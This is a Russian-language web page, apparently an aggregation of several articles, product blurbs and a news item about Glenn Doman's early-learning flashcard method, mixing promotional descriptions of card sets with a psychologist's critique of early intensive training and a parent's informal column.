HomeРазноеИз домана: Обучающие карточки по методике Г. Домана, А6 МИКС (4047950) — Купить по цене от 27.50 руб.

Из домана: Обучающие карточки по методике Г. Домана, А6 МИКС (4047950) — Купить по цене от 27.50 руб.

Содержание

Основные принципы методики раннего развития Домана-Маниченко

Век революций – двадцатый – дал возможность переосмыслить многое, в том числе процесс воспитания и обучения ребенка. Именно революцией назвал свою методику раннего развития американский нейрохирург Гленн Доман.

Доман создал свою систему в 40-х годах для обучения детей с проблемами здоровья (мозговыми травмами, поражениями центральной нервной системы). Разработанные им методы воздействия на головной мозг помогали этим детям достичь больших результатов, чем принято было ожидать. Впоследствии в его институте эту же методику взяли на вооружение и при обучении обычных детей. По мнению Домана, проблема обучения в раннем возрасте (до 3 лет) состоит лишь в том, что дети, воспринимая информацию моментально, не способны дать родителям это понять. Ведь заниматься нужно с рождения, а малыш еще не умеет говорить. В таком случае, задача взрослых – предоставить как можно больше фактов, образов, впечатлений, чтобы ребенок развивался гармонично и активно.

В основе методики Домана – восприятие информации одновременно через визуальный и аудиальный каналы. Иными словами, все занятия проводятся по определенной схеме: информация многократно демонстрируется ребенку на специальных карточках и сразу же озвучивается.

В обучении по методике Домана можно выделить несколько основных направлений: чтение, математика, знакомство с окружающим миром.

Обучение чтению

Основываясь на том, что изучение слов по буквам и слогам имеет достаточно высокий уровень абстрактности, Гленн Доман пришел к выводу: запомнить слово целиком ребенку намного проще. Тем более, если начать занятия как можно раньше. В самом раннем возрасте мышление ребенка направлено на обучение. У него гибкая память, которую нужно усердно тренировать, способность легко переключаться, обращать внимание на все и сразу. И ориентируется в мире маленький ребенок, рассматривая окружающие предметы, явления, людей.

Доман предлагает обучать чтению путем показа карточек со словами. Чтобы малыш мог сфокусировать на них свое внимание, слова должны быть крупными и яркого (красного) цвета на контрастном белом фоне. Показывать такие карточки необходимо быстро и в определенном порядке. На группу из 5 карточек уйдет 5 секунд. На все занятие (3 раза в день) – 15 секунд. Достаточно ли этого для запоминания? Как утверждают ориентированные на эту методику специалисты, вполне. Ребенок словно фотографирует словесный образ и постепенно учится соотносить его со звуковым. Позже количество карточек увеличивается, а шрифт на них уменьшается и становится черным – с возрастом ребенок развивает способность распознавать мелкие детали.

Обучение математике

Оно построено также по принципу карточек, на которых изображены крупные красные точки. Предполагается, что таким образом малыш научится считать до ста, воспринимая каждой число именно как количество, а не как абстрактный образ (цифры). Доман доказал, что ребенок способен воспринимать количественные множества целиком и различать их визуально.

Большое внимание Доман уделяет и физическому развитию. Мы знаем, что мелкая моторика связана с беглой речью, но любая физическая активность также стимулирует работу мозга. Доман утверждает, что залог здоровья – это движение, а интеллект развивается, лишь когда перед ним ставят все новые и новые задачи. Успехи детей особенно в этой сфере убедили многие семьи перейти на обучение по методике Домана. В 90-е годы она пришла и в Россию.

Методика Домана-Маниченко

Преобразовать методику Гленна Домана взялся педагог Андрей Маниченко. Он разработал дополнительные обучающие задания и по-новому взглянул на сам процесс занятий с ребенком. Если Доман рассматривал обучение в отрыве от детских развлечений, то Маниченко предложил игру как основной способ общения.

Методика Домана-Маниченко теперь широко известна и применяется не только для развития навыков чтения и счета – с ее помощью родители обучают детей иностранным языкам, географии, истории, развивают его творческие способности. В созданной Андреем Маниченко компании «Умница» разрабатываются все новые и новые комплекты для раннего развития малыша. Занятия по ним делают ребенка более эрудированным, а самое главное, помогают ему сохранить способность запоминать большой объем информации. Это свойство является, пожалуй, самым важным во время бурного интеллектуального развития малыша.

В этом плане интересна программа развития мышления и кругозора «Мир на ладошке». Она рассказывает ребенку о вещах, с которыми он сталкивается каждый день, и о тех предметах и явлениях, знание которых является базовым. Эти занятия проходят с карточками – с крупными яркими картинками. Помимо названий и зрительных образов изображенных предметов ребенок усваивает и всевозможные интересные факты о них. Также создатели комплектов предлагают множество игр и творческих заданий. Малыш будет изучать окружающий мир не только по карточкам, но и непосредственно наблюдая за ним и ставя эксперименты. Для ребенка это не только полезно, но и чрезвычайно интересно.

Однако основополагающими для методики Домана-Маниченко по-прежнему являются занятия по чтению и математике. В чем же их отличия от методики-источника?

Маниченко создал целую систему развития интеллекта с пеленок, где объединил лучшие находки Домана и собственные разработки.

Так, комплект «Чтение с пеленок» в основном следует первоначальной схеме занятий: ребенок изучает карточки со словами, после переходит к словосочетаниям, далее – к предложениям. Но Маниченко разработал и продолжение комплекта – первые книжки для малыша. Переход к чтению непосредственно книг – процесс важный, но трудоемкий. Книги должны отвечать всем требованиям методики, и Доман утверждал, что найти их очень проблематично. Книги Маниченко разработаны специально для органичного продолжения занятий с карточками.

Для продолжения обучения и закрепления результатов, полученных при работе с карточками, был создан целый комплект – «Говорим с пеленок» (Умница) – обновленная версия 2015 г. Кроме карточек со словами (а также с отдельными буквами), в его состав входят книги-листалки. Они устроены таким образом, чтобы основной принцип – демонстрирование информации в быстром темпе – сохранился. При этом каждая книга содержит увлекательную игру-манипуляцию с пройденными словами (это может быть пальчиковая игра, считалка, мирилка, умывалка и так далее). В свою очередь, на карточках этого комплекта повторяются слова, употребленные в книгах.

Итак, ребенок умеет читать, еще не научившись хорошо говорить. На это нацелены занятия – и они дают результат. Однако не стоит ждать феноменального интеллектуального скачка от каждого ребенка. Родителям нужно усердно заниматься с ребенком, поддерживать его, направлять. Только тогда он потянется к знаниям.

Кроме чтения, методика предполагает обучение счету. Комплект «Математика с пеленок» (Умница) рассчитан на изучение чисел и простейшей арифметики. По методике в нем нет никаких серьезных изменений в сравнении с Доманом, кроме самого общего принципа компании «Умница»: заниматься с ребенком нужно играя.

Полностью игровое воспитание представлено в методике Сказкотерапия, также от компании «Умница». Это серия комплектов персонализированных сказок, в которых ребенок – главный герой. Поведение этого героя, соответственно, становится примером для подражания или назидательным уроком. В комплектах есть и маленький игрушечный рассказчик – кукла-перчатка. Надевая ее на руку и озвучивая, родители могут сделать игру более легкой для восприятия, а также обратить внимание малыша на важные моменты сказки.

Эмоциональное и психологическое развитие столь же важно, как и интеллектуальное, поэтому все комплекты и методические пособия желательно использовать в связке.

Ребенок с первых дней жизни знакомится с миром и активно формирует не только характер и бытовые пристрастия, но и собственную информационную базу. Задача родителей помочь ему в этом, предоставить малышу как можно больше возможностей. Заложить фундамент будущей личности в возрасте до 3-х лет необходимо, и методика Домана-Маниченко может в этом помочь.

Дуглас Доман, специалист по реабилитации детей с поражениями головного мозга, провел семинары на базе РГСУ

22 октября 2012 | 7758

С 14 по 19 октября на площадке РГСУ, в Лицее одаренных российских детей (пос. Доброе, Московская область), состоялись семинары Дугласа Домана (США), специалиста по реабилитации детей с поражениями головного мозга, сына и последователя Гленна Домана.

 

С 14 по 19 октября на площадке РГСУ, в Лицее одаренных российских детей (пос. Доброе, Московская область), состоялись семинары Дугласа Домана (США), специалиста по реабилитации детей с поражениями головного мозга, сына и последователя Гленна Домана.

  

  

В ходе первого визита Дугласа Домана в РГСУ в июле этого года между руководством университета и представителями Института достижения человеческого потенциала был достигнут ряд договоренностей о сотрудничестве.

Корпуса, в которых проходили семинары Д. Домана, тщательно оборудованы для комфорта слушателей. Семейные пары прибыли из разных уголков страны, а также из-за рубежа. В комнатах, выделенных для семей с больными детьми, созданы максимально комфортные условия. Дуглас Доман лично контролировал поступление уличного шума и света в помещение, также  контролировал он и климат-контроль в основном зале.

Программа трехдневной обучающей программы для родителей, чьи дети страдают поражениями головного мозга, была  расписана по минутам. В пос. Доброе из г. Филадельфия (США) прибыли специалисты для работы со слушателями и их детьми.

  

  

На лекции в ДК РГСУ в июле 2012 года Дуглас Доман произнес: «Никогда, никогда, никогда не сдавайтесь!» Эти слова тогда заставили многих родителей больных детей поверить в свои собственные силы, а кого-то — задуматься о прохождении курсов и обучении в Филадельфии по реабилитации детей.

Программа курса расчитана на несколько этапов с перерывами.

РГСУ планирует продолжать сотрудничество с Институтом достижения человеческого потенциала.

Для справки: В сороковые года XX века молодой физиотерапевт Гленн Доман (отец Дугласа) начал разработку программы реабилитации детей с тяжелыми поражениями нервной системы. Основной целью программы была активизация умственной деятельности больных детей через обучение. В своей системе он использовал карточки с красными точками, картинками и словами. Эти карточки показывались ребенку на короткое время, но много раз за день. Постепенно количество карточек увеличивалось. Карточки являлись раздражителями, которые стимулировали резервные здоровые клетки мозга. Уходили месяцы кропотливой работы, прежде чем больные дети начинали развиваться, двигаться, говорить. Умственно отсталые дети в своем развитии догоняли своих сверстников. Больные дети начинали ранее положенного срока говорить, считать, писать. Впоследствии методику Домана стали применять как развивающую для обучения здоровых детей.

Текст, фото: Инна Бугаева

Актуальные новости

  • 22 марта
    22


    мар

    Инициативы, развивающие местное самоуправление

    В ходе подготовки к проведению Всероссийского Конкурса «Инициативы, развивающие местное самоуправление» 22 марта 2021 года в стенах Российского государственного социального университета состоялась встреча Ректора университета Натальи Борисовны Починок, декана факультета Управления Антона Николаевича Островского с Ответственным Секретарем Всероссийского Конкурса «Инициативы, развивающие местное самоуправление», Председателем Совета директоров Института культурно-правового развития Ириной Сергеевной Яшиной, Заместителем Председателя Совета директоров Института культурно-правового развития по общим вопросам Слижевской Анной Александровной и представителями Организационного комитета Конкурса.

  • 23 марта
    23


    мар

    Новатор Москвы

    РГСУ приглашает Вас принять участие в премии Мэра Москвы «Новатор Москвы», который проводится для стимулирования разработки и внедрения новаторских идей, создания новых прогрессивных технологий, поддержки талантливых авторов новаторских идей и изобретений (постановление Правительства Москвы № 983-ПП от 6 августа 2019 г. )

Методика Домана как заниматься карточки

  • Методика Домана как заниматься
  • Карточки Вундекинд с пеленок-чем отличаются от аналогов?
  • Как вырастить вундеркинда? Как дать ребенку возможность быстро развиваться, легко усваивать знания, тренировать память?

Глен Доман посвятил изучению этих вопросов много лет. Методика Домана началась с работы с детками, которые отставали в развитии от сверстников. Глен Доман начал заниматься с такими малыша по собственной методике и достаточно быстро малыше не просто догнали, но и обогнали сверстников в развитии. Когда методика зарекомендовала себя, ее стали применять широко в практике раннего развития малышей, особенно в области обучения чтению и иностранным языкам.

Зачем заниматься с малышом по методике Домана?

Раннее развитие. Вы закладываете ребенку правильные ранние основы знаний, как результат малыш быстро осваивает знания в садике и школе.

Раннее изучение иностранного языка. Начинать заниматься по карточам можно с рождения. Яркие изображения с озвучкой легко запоминаются малышом, не несет дополнительной нагрузки на психику ребенка. Знания усваиваться быстро и уже к 2-3 годам, ребенок с которым занимались по двуязычной методике домана сможет понимать мультики на разных языках.

Обучение алфавиту и чтению. Проверено, малыша которые занимаются по методике Домана, раньше начинают читать, четко произносят слова и быстро вникают в суть прочитанного.

Основные элементы занятий по методике Домана

  1. Яркая картинка, на белом фоне, определенного размера. Изображение должно быть максимально качественным, реалистичным, цветным
  2. Регулярность занятий -3-5 раз в день, буквально по 1-3 минуты.
  3. Смена карточек, порядка их воспроизведения, добавления каждые 3-5 дней по 5 новых карточек.
  4. 1 карточка-1 секунда
  5. Добавление постепенно разных тематики и сложности карточек, работа с изображением +голос, задания, факты о показываемом объекте.

Как и когда начинать заниматься по Доману 3 простых правила

  1. Заниматься по Доману можно с рождения. На наш взгляд максимально целесообразно начинать с 1-1,5 месяцев, когда малыш уже хорошо фокусирует взгляд.
  2. Заниматься желательно по 1-3 минуты несколько раз в день, ежедневно. Как и в любой методике, для получения результата важна стабильность и регулярность.
  3. Заниматься желательно после того как малыш поспал и поел, находится в хорошем расположении духа.

Золотое правило любого начинания: хорошее настроение и правильный настрой -у вас все получится!

Базовые упражнения по методике Домана

  • Вы показываете карточку малышу четко произнося название предмета
  • 1 картчока-1 секунда
  • Карточки показываете в разной последовательности.
  • 5 дней -5 карточек, затем можно добавлять новые 5 карточек.
  • Когда 1 тематика полностью изучена (как правило, это набор из 20 карточек), можно приступить к следущему набору и так далее.
  • По мере взросления малыша и степени изучения карточек, можно добавлять факты и задания (в больших карточках эта информация размещена на обратной стороне карточки)
  • Можно также подключать различные игры: ассоциативный ряд (найди лишнее, объединить карточки по какому-либо признаку-форма, цвет) и т.д.

Любая мелочь играет роль в процессе обучения по карточкам Домана -фон, шрифт которым подписаны изображения, то, как мы произносим название фотографии, качество самого изображения.

На рынке есть достаточно много различных производителей карточек Домана, они могут отличаться по цене и по качеству. Но самое важное, чтобы были соблюдены базовые приниципы и требования к изображению, которые Доман прописывал в своей методике.

Наш выбор -карточки Вундрекинд с пеленок, которые 100% соответствуют всем требованиям, выполнены на качественном толстом картоне. Фотографии размещены исключительно на белом фоне и подписаны большими буквами.

  • Есть 2 основным вида карточек: большие карточки с фактами (16,5*19,5) и карточки мини.
  • Карточки охватывают совершенно разные тематики: деревья, фрукты, растения, космос, профессии, транспорт.
  • Карточки выпускаются на русском, украинском языках, также есть двуязычные варианты русский-английский.
  • Есть книга по методике Домана, где подробно расписано как нужно заниматься.
  • Кроме отдельных наборов карточек, есть наборы-чемоданы, куда входят до 1300 разных карточек, диски и книга.
  • DVD и CD диски -это дополнительные карточки-презентации с фактами, можно заниматься с малышом за компьютером.

Секрет: что сделать чтобы карточки прослужили долго

Если вы планируете использовать карточки Домана часто, в школе раннего развития или заниматься в группе с малышами -рекомендуем ламинацию-в этом случае карточки будут служить вам очень долго:)

Занимаетесь по методике Домана? Хотите поделиться отзывом, а также узнать что другие родители думают об этой методике? Будем рады!

К началу учебного сезона 2014 Вундеркинд с пеленок подготовил много интересных новинок

Набор Вундеркинд с пеленок чемодан на украинском языке

Мегачемодан набор карточек Домана мини на русском языке 1300 карточек!

Карточки обучение чтению и алфавит

Также постоянно расширяется ассортимент карточек на украинском языке.

Академия с пеленок — Методика Г. Домана

Глен Доман – автор программы интенсивного интеллектуального и физического развития детей с момента рождения, основанной на результатах детального изучения закономерностей развития детей.

Основная идея методики: в любом ребенке скрыт огромный потенциал, который можно развить, тем самым предоставляя ему неограниченные возможности в жизни.

Принципы «правильного» обучения Доман основывает в первую очередь на развитие «энциклопедических знаний» ребенка. «Человеческий мозг – это самый совершенный компьютер, и он подчиняется тем же самым правилам: чем больше фактов ему известно, тем больше выводов он сможет из них извлечь. При этом если мы будем забивать головы наших детей всякой ерундой, вряд ли стоит ждать от них умных речей и поступков. Поэтому мы должны снабжать их точной, отчетливой и недвусмысленной информацией».

Обучать ребенка чтению можно начинать с шестимесячного возраста. Глаз видит написанное слово, но сам ребенок не понимает его значение. Если малыш видит и одновременно слышит написанное слово, тогда его мозг интерпретирует полученную информацию: «понимает» и механически запоминает написанное. Доман считает, что со временем малыш на основании собственного опыта поймет законы чтения, счета точно так же, как когда-то он научился понимать устную речь.

Американский врач-педиатр Глен Доман советует:

  •  Начинать как можно раньше.
  •  Учите с удовольствием.
  •  Уважайте своего ребенка и доверяйте ему.
  •  Учите лишь тогда, когда процесс обучения нравится вам обоим.
  •  Создайте подходящую обстановку для обучения.
  •  Останавливайтесь прежде, чем ваш ребенок сам этого захочет.
  •  Почаще вводите новый материал.
  •  Тщательно готовьте учебные материалы и делайте это заранее.
  •  Если вам и вашему ребенку не интересно, прекратите занятия. Видимо, вы делаете что-то неправильно.

На заметку!

еще

Малыши в академии не устают и не теряют интерес к предлагаемым заданиям благодаря правильной структуре занятия: дети могут и двигаться, и смотреть, и слушать, и петь, – происходит постоянная смена деятельности.

В академии прибывают в благоприятной и безупречной материально-технической, методической и предметно-развивающей среде. Залы оснащены лучшим оборудованием от мировых производителей.

Посещение театральной студии – это то, что пригодится в дальнейшей жизни вашего ребенка. Театрализованная деятельность помогает ребенку развиваться и совершенствоваться, что непременно является основой успеха.

На занятиях по рисованию в амкадемии дети знакомятся с разнообразными изобразительными материалами и нетрадиционными техниками рисования, такими как: монотипия, граттаж, по сырому, по мятой бумаге и т. д.

Занятия в «Лего» – отличная возможность для ребенка расширить кругозор, раскрыть в доступной форме основы конструирования. В процессе игры ребенок получает опыт общения в детском коллективе.

Замечено, что шахматисты не теряются в критических ситуациях, не впадают в панику, а думают, ищут выход. Общеизвестно также, что шахматы учат логически мыслить.

Наш курс обучения английскому языку, является прекрасным стартом для формирования первичных устноречевых навыков, достигается основная цель – у детей появляется и растет желание научиться говорить по-английски.

Иметь речевые проблемы для посещения кабинета логопеда совсем не обязательно. Поговорите со специалистом о том, что dас волнует в речи ребенка, каковы возрастные нормы развития речи, как правильно разговаривать с ребенком.

Раннее развитие и методика Глена Домана

   Уважаемые родители, поскольку вопросы по методике Глена Домана продолжают поступать, я решила выделить эту тему отдельно…

   Конечно, все родители желают своему ребенку только самого лучшего. Вовсе оставить ребенка в покое, чтобы он рос «как трава», — тоже не лучший вариант. Другое дело, что заниматься с ребенком есть смысл ради его благополучия, а не для того, чтобы было что предъявить друзьям и знакомым. 

   Ребенку нужно, чтобы вы помогли ему развиваться в его собственном темпе и сами принимали деятельное участие в его развитии. Ведь воспитание, в конце концов, означает не воздействие, а взаимодействие, сотрудничество с ребенком. И самое главное в нем — не притупить природную любознательность ребенка и отвечать на все его вопросы. Не страшно, если ребенок научится читать, только пойдя в школу в семилетнем возрасте. Хуже, если он еще до школы потеряет интерес к обучению как к деятельности, которую ему навязывали с самого рождения. Ведь дело не в том, сколько и чего будет знать малыш, а в том, каким он вырастет — любознательным и творческим или озлобленным занудой, который много о чем слышал, но ничего не хочет.

О методике Глена Домана, позволяющей осуществить, так называемый, ранний старт

   Недостатки «раннего старта»

   Мозг ребенка созревает постепенно. Сначала созревают нервные центры, отвечающие за дыхание и пищеварение, потом — за движение и восприятие, только потом — за эмоциональный контроль, волевые процессы. Восприятие символов( буквы и цифры созревает одним из последних. Если принудительно нарушить эту последовательность, если начать активно развивать центры чтения до того, как созреют предыдущие, становление ребенка может отклониться от нормы.

   Чрезмерное интеллектуальное напряжение вызывает приток крови к коре головного мозга. При этом обедняется кровоснабжение центров, отвечающих за дыхание, пищеварение, сердцебиение, в результате чего возникают спазмы сосудов — и, соответственно, ребенок получает целый букет заболеваний. Причины спазмов в детском возрасте также связаны и с психологическим напряжением, которое очень и очень часто возникает у тех, кого раньше времени сажают за парты.

   Активное развитие лобной доли, отвечающей за символическое мышление, тормозит развитие всех видов восприятия, а значит и сенсомоторного интеллекта, который развивается в раннем и дошкольном возрасте. 

   Когда ребенок в два года читает и узнает картины Врубеля и Верещагина — это впечатляет. А то, что он не умеет играть, общаться с детьми, самостоятельно кушать, одеваться, ходить в туалет, кажется незначительным. Но приходит время… И выясняется, что гению жить совсем не просто. Очень интересны работы Сиротюк А.Л. — нейропсихолога. У нее есть убедительные данные о СДВГ (синдром дефицита внимания и гиперактивности) у детей, обучавшихся по системам с использованием карточек.  

Возникает вопрос: можно ли пользоваться карточками и картинками из набора методик «Глена Домана»?

   Сначала приведу типичное высказывание родителей по поводу использования картинок.

   Говоря о системе Домана, я думала, что показывая карточки я помогу малышу соотносить слова и предметы(возможно он их запомнит). Мы не занимаемся физическими упражнениями по этой системе, только карточки. Наверное,я все таки ошибаюсь и действительно никакой пользы в нашем случае от этой системы нет.

   Здесь часто происходит путаница.

   Система Домана — это не просто ознакомление ребенка с изображением реальных, знакомых ему игрушек, бытовых предметов, членов семьи и домашних любимцев. Если вы собираетесь заниматься таким показом, называя каждую картинку, рассматривая ее с ребенком, сопоставляя с реальным объектом — это не принесет никакого вреда и будет полезно для развития ребенка.

   Показ рисунков по Доману — это демонстрация изображений, большинство из которых не знакомы ребенку по его собственному опыту. Демонстрация проходит в быстром темпе и количество изображений быстро наращивается без учета усвоения их ребенком. Все это, как уже было написано, поглощает все мозговые ресурсы, обедняя сенсорные, двигательные зоны.

   Если вы уже купили набор рисунков по методике Домана, вы вполне можете использовать ту часть, которая соответствует возрасту и развитию ребенка. Главное в их использовании то, что использоваться должна адекватная методика.

   Кроме того, не следует забывать, что нужны не только предметные, но и сюжетные картинки: мишка спит, зайка кушает и т. д.

   Для таких занятий лучше приобрести книги, журналы, специально разработанные для раннего возраста.   

   На почте вы можете выписать детские журналы издательства «Карапуз», по интернету или в магазине купить набор книг «Школа семи гномов «первые 2 года жизни.

   Издаются также и наборы иллюстративного материала.

   Вот, например, такой набор я купила в интернете: «Развитие речи детей раннего возраста» Авторы Ю.А. Разенкова, С.Н. Теплюк, И.А. Выродова. Очень рекомендую.  

Таким образом, подведем итог: ранняя помощь должна учитывать естественный путь развития ребенка.

   Чуть более конкретно: ранее развитие основано на теплых, эмоционально положительных отношениях со взрослым, а также двигательном и сенсорном развитии. Если речь идет о помощи особым детям, то учитываются и особенности развития при данном нарушении.

Примерами таких программ за рубежом могут служить «Портэдж», «Каролина». и другие.

Всем известные «Маленькие ступеньки» также отвечают этим условиям, но несколько устарели по отдельным параметрам, что не удивительно, если учесть, что созданы они более 30 лет назад.

   По поводу «фабрики гениев» есть исследования и наблюдения, которые показали несостоятельность уже взрослых людей, которых в эти гении готовили. Необоснованно раннее использование символов привело к их беспомощности в практической жизни. «Тепличные люди», а именно так их называют, полностью отражают суть проблемы, которая возникает, когда ребенка развивают не учитывая онтогенеза развития человека и ребенка, в частности. 

Практические советы родителям

   Для того чтобы родители не увлекались чрезмерно слишком ранним и чересчур «всесторонним» развитием своего чада, психологи советуют им соблюдать нехитрые правила. Вот некоторые из них.

   Не превращайте успехи малыша в повод продемонстрировать перед людьми его необыкновенные способности. Из этого он вынесет одно: я занимаюсь не потому, что мне интересно, а для того, чтобы удивить взрослых.

   Не гонитесь сразу за модными методиками- Никитина, Глена Домана и т.д. Может быть, начать стоит с обычной детской пирамидки и деревянного конструктора — ведь это тоже развивающие игры.

   Сегодня существует масса развивающих методик, но вовсе не обязательно следовать принципам единственной. Выберите в каждой то, что близко и понятно вам и интересно малышу. Решив заняться ранним развитием, не скупайте подряд все пособия. Пусть ребенок сначала освоит что-то одно.

   Не забывайте и о развивающей возможности повседневной практической деятельности ребенка. В подавляющем большинстве случаев именно детская бытовая деятельность оказывается наиболее эффективной для развития ребенка, так например, простая просьба «идем мыть руки» требует от ребенка умения понять, что ему предлагают, ориентироваться в пространстве, использовать все свои двигательные возможности, выполнить определенную последовательность действий при умывании и т.д.

   Никто вам не скажет, в каком возрасте вашего ребенка надо учить цветам или цифрам. Только вы сами можете решить, с чего начинать занятия. Главное — не переусердствуйте и не перегрузите малыша знаниями, а двигайтесь вперед постепенно — от очень простого к простому, от простого — к чуть более сложному.

   И здесь вам поможет повседневная деятельность: ребенок может после стирки разложить носки на две кучки: большие — папины, и маленькие — его собственные, а затем свои разобрать по цвету на пары. 

   Откажитесь от соблазна выделить для «развития» определенное время. В этих занятиях регулярность — не самое главное. Гораздо важнее для них хорошее настроение родителей и малыша, увлеченность и желание «развиваться». Прислушайтесь к ребенку, который вдруг увлекся только буквами или только складыванием кубиков. Пусть он занимается тем, что ему интересно, а не тем, что у вас сейчас по расписанию.

   Не настаивайте на занятиях, если ребенок поглощен игрой в куклы или машинки. А если вас именно сейчас обуял развивающий зуд, попроситесь в его игру.

   Самая лучшая «методика» развития — общение. Ваши занятия будут односторонними, если между ними вы не будете говорить с ребенком. О чем? Да обо всем на свете…

нужны ли ребенку модные методики раннего развития – Москва 24, 26.08.2020

Журналист и мама 2-х летнего сына рассуждает о популярных методиках раннего развития и делится тем, как удалось внедрить многие из них в жизнь без особых усилий.

Фото: depositphotos/mac_sim

Знакомые периодически спрашивают про развивашки. Я обычно в замешательстве от этого вопроса. Главный мой принцип уже второй год – насколько возможно соблюсти баланс между работой, ребенком, домашними обязанностями и личной жизнью. На то, чтобы специально что-то делать, просто нет времени. Поэтому мне всегда был ближе подход свободного и естественного развития.

Но несколько дней назад, когда начала углубленно изучать этот вопрос, оказалось, развивашки все-таки присутствуют в нашей семье. Какие-то пособия родственники подарили. Что-то начали делать, чтобы просто скоротать время и разнообразить досуг. А что-то удивительным образом само органично вписалось в быт.

И такой подход кажется наиболее оптимальным.

Сейчас сыну 2 года. На мой взгляд, в этом возрасте вообще можно обойтись без всех новомодных методик. Особенно если они в тягость родителям или малышу.

Я, как мама, совсем не боюсь, что «после трех уже поздно». Если растить гения – может быть, да. Но хочу ли я вырастить гения? Не думаю. Хочется вырастить счастливого и открытого миру человека.

Наше правило – заниматься чем-либо в удовольствие. Будь то игра в песочнице дни напролет или оформленные и описанные методики.

У Монтессори мне нравится принцип «помоги мне сделать все самому». Сын радостно накладывает себе еду, приносит ботинки и старается орудовать всем, до чего может дотянуться. Уже давно хочу купить напольный стеллаж для детских книг, чтобы парень мог брать книги и читать, поставить пластмассовый кувшин с водой в зоне досягаемости рядом со стаканом, чтобы сам пил, когда хочет. Представляю, какой урон нас ждет: он очень любит переливать (читай: выливать) воду. Но мне кажется, это классный опыт. И вообще, как будет время, постараюсь повесить и положить все его вещи так, чтобы он смог их брать сам.

Тут, если честно, думаю больше о нас с мужем – чем раньше научится самостоятельности, тем меньше забот. И сын счастлив, и родителям хорошо.

В Вальдорфской педагогике привлекают занятия ручным трудом и садоводством, стремление к натуральным материалам в играх, развитие фантазии и приоритет духовного развития. Садоводство – любовь этого года. Спасибо пандемии: ягоды собирали, траву косили, грядки пропалывали. Не только ребенок, но и мы получили необычный опыт. Даже вырастили свою кинзу. Планируем продолжать и дальше, уже на подоконнике московской квартиры.

Фото: depositphotos/yanlev

Еще у нас дома есть карточки Домана. Тут отдельный привет бабуле, которая их купила. Говорит, что хотела еще по английскому языку, но решила пока ограничиться родным. Карточки обо всем на свете, на каждой есть изображение и название. К ним обращаемся нечасто, по настроению (хотя в инструкции написано, что нужно несколько раз в день). Но сын любит рассматривать иногда. Даже сам просит. Особо ценит строительную технику. Кстати, благодаря этим пособиям и мы с мужем узнали некоторые названия, вроде фронтального и вилочного погрузчиков.

Также в нашей семье муж активно занимается спортом. Причем чаще всего при ребенке, который не прочь присоединиться. Сын любит лазить по шведской стенке, висеть на турнике и кольцах. Физическое развитие наравне с интеллектуальным – один из постулатов системы Никитиных, в которой особое внимание уделяется здоровому образу жизни и закаливанию. Я тоже стараюсь по возможности не кутать малыша и не бояться сквозняков.

Скоро у нас появится няня, она попросила купить японские развивающие тетради Kumon и в нашей жизни появится еще одна методика.

Вот так, без активных усилий и определенных четких планов, все складывается само. Вывод, который я сделала для себя, – стоит ориентироваться на желания и возможности семьи. И делать так, чтобы было комфортно. В этом, мне кажется, залог успеха.

Читайте также

Методика развития Глена Домана | КупиМама Москва


Методика разработана американским врачом-нейрофизиологом Гленом Доманом, автором программ интеллектуального и физического развития детей с рождения.

Кто такой Глен Доман?


Окончив в 1940 году университет в США, молодой врач-физиолог Глен Доман начинает свою карьеру и продолжает исследование в области развития детского мозга, начатое им еще во время обучения. Однако его мир меняется, когда в 1941 он принимает решение идти в армию добровольцем и защищать людей и детей именно так.


Вернувшись после войны, Доман возвращается к медицине. Пытаясь как-то исправить ужасы войны, он погружается в проблему помощи детям с повреждениями головного мозга и нервной системы, их реабилитации и возвращении к обычной жизни. На протяжении 20 лет нейрофизиолог Глен Доман постоянно находился в работе, проводит многочисленные исследования, опыты, эксперименты. Его основная задача — найти пути и возможности для излечения детей с полной или частичной парализацией, сильным отставанием в развитии. По его мнению, важно лечить первопричину – головной мозг, а не тело.

Основные принципы и когда начинать


В результате своих наблюдений Доман пришел к выводу, что дети за всю свою жизнь не узнают столько, сколько информации могут усвоить в первые 6 лет жизни. Практически с рождения ребенок готов к познанию мира, его интересует все, что находится в его окружении. В таком возрасте вам не придется дополнительно мотивировать ребенка. Занятия необходимо проводить в форме занимательной игры. По его мнению, приступать к обучению детей можно с 3 месяцев, ведь именно в этом возрасте кроха проявляет реакцию на предметы.

Интеллектуальное развитие


Ориентируясь на то, что малыши, прежде всего, начинают воспринимать информацию с помощью зрительных и слуховых анализаторов, Доман положил в основу своей разработки данный принцип.


Нейрохирург предлагает демонстрировать детям написанные на отдельных карточках слова. Слова должны быть конкретными и имеющие для дошкольника особый смысл: МАМА, ПАПА, КАША, КОТ. Затем упражнения немного усложняются тем, что демонстрируемые слова подразделяются на различные категории и уже направлены не на эмоциональный отклик ребёнка, а на развитие его логического мышления. Стоит заметить, что слова должны быть написаны крупными красными буквами. На одной карточке – одно слово.


В дальнейшем, по мере взросления и развития ребёнка, ему показывают карточки с изображениями различных животных, фруктов и т. д. Карточки сопровождаются соответствующими надписями – названиями демонстрируемых изображений. Так у малыша формируется взаимосвязь между зрительным образом и словом. Это, по мнению Домана, обеспечивает плавный переход к чтению. Ребёнок учится воспринимать не отдельные буквы, а целые слова. К этому моменту он уже осваивает некоторые звуки, слоги и их сочетание.

Поговорим о физических упражнениях


Именно физическому развитию Глен Доман уделяет большое внимание. Он уверен, что оно напрямую взаимосвязано с развитием головного мозга ребенка. Именно поэтому нужно уделять внимание хорошему физическому развитию с рождения.


Потребности ребенка в плавании, хождении, ползании, хватании даны ему от природы. Необходимо с момента появления крохи на свет одобрять их развитие, предоставлять ребенку полную свободу движений.


В этом может помочь специальный трек для ползания. Необходимо, чтобы кроха располагался между его бортиками, практически касаясь их предплечьями и бедрами. Трек располагают под небольшим уклоном. Лучше всего, чтобы его поверхности были гладкими, не требуется никаких одеял или матрасов. Одевать кроху, ползающего там, нужно по минимуму.


В течение дня малышу рекомендуется проводить в нем не менее 3-4 часов. По такому треку ребенок сможет проползать довольно большое расстояние, а к 4 месяцам, при условии правильной организации, уже начнет активно ползать.


Учите малыша преодолевать препятствия с помощью разнообразных валиков и лесенок. Переворачивайте и крутите ребенка как можно чаще, этим вы поспособствуете развитию чувства равновесия. Помогайте и поощряйте его в попытках ходить, бегать, плавать.


Для новорожденных Глен Доман создал свою программу равновесия – динамическую гимнастику, которой с успехом вы можете воспользоваться в домашних условиях.


Так же, предлагайте малышу перекладину для захвата. Пусть ребенок учиться сам висеть, а вы постепенно минимизируйте поддержку.

Не менее важные – это интеллектуальные упражнения


1. Как научить вашего ребенка читать? Для этого малышу демонстрируют карточки со словами. С начала занятий рекомендуется показывать по 15 карточек с существительными три раза. С количеством дней увеличивается количество сеансов. На следующих этапах увеличивается и количество слов.


